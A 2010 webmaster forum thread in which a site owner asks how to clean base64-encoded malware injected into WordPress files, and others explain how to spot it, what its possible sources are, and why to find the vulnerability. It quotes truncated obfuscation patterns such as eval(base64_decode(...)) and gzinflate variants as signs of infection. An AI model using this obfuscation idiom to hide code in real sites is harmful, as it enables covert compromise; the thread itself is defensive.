Removing malicious lines of base 64 code

Forum Moderators: phranque

Message Too Old, No Replies

Removing malicious lines of base 64 code

Malware in files, what to do, how to remove?

skibum

5:58 pm on Sep 30, 2010 (gmt 0)

So in a hosting account with a few Wordpress installations, there are several files that have been injected with malicious code. The web host says I will need to remove the malicious lines of base 64 code and secure the account against future attacks. There is a list of probably at least 200 files. Many are in the wp-admin, wp-includes, wp-content/themes and a few others I created trying to learn php/mysql and understand all this stuff better.

Any suggestions on what to do or how to remedy this? This all might as well be written in Chinese as I have no idea what to do. I looked at a few of the files I created and nothing jumps out at me as being out of place so can't see any "malicious lines of base 64 code".

lammert

2:57 am on Oct 1, 2010 (gmt 0)

These lines shouldn't be too difficult to recognize. They all start with something like

eval(base64_decode('some string...

The more sophisticated versions use zip compression:

eval(stripslashes(gzinflate(base64_decode('some string ...

I had them a few months ago in a WordPress installation of a non-profit organization I host for. The lines were there right from the beginning--even before the site went live--and I therefore don't think they were injected, but part of a free theme they found somewhere. I didn't analyze it fully, but it seemed that part of the functionality of the theme was coming from an external server and that server delivered the malicious payload. The download code from that remote server was base64 encoded, to make it difficult to identify for the average website builder.

Rather than cleaning up the mess, I just disabled the use of WordPress, removed all files and pushed the user in the direction of another CMS.

phranque

7:24 am on Oct 5, 2010 (gmt 0)

you have to figure out where the vulnerability is to ultimately solve the problem.
for example, it could be that someone obtained your login credentials, or that another account on the shared server provided a back door, or that you installed a theme containing some "bad stuff", or that WP or a plugin has a vulnerability.

here are a few WebmasterWorld posts that may provide some clues.

Website HACKED - help!:
http://www.webmasterworld.com/webmaster/4042154.htm [webmasterworld.com]

I have a site hijacking my wordpress - can you help?:
http://www.webmasterworld.com/content_management/3830507.htm [webmasterworld.com]

30 day ban for cloaked outgoing links due to PHP hack:
http://www.webmasterworld.com/google/3823009.htm [webmasterworld.com]

skibum

7:44 am on Oct 5, 2010 (gmt 0)

Thanks! Was looking at the files noted by the host as having Base 64 code in them and could not find any strange code in a handful that were supposedly infected. Doubt I'll ever be able to figure out where the backdoor is if changing login credentials doesn't work but those threads add a few more things to run through to try to clean things up.

phranque

9:32 am on Oct 5, 2010 (gmt 0)

as was mentioned in one thread the payload could be dynamically included from an external server.
also note that the database may contain the encoded javascript and the php script is assembling that content on the fly.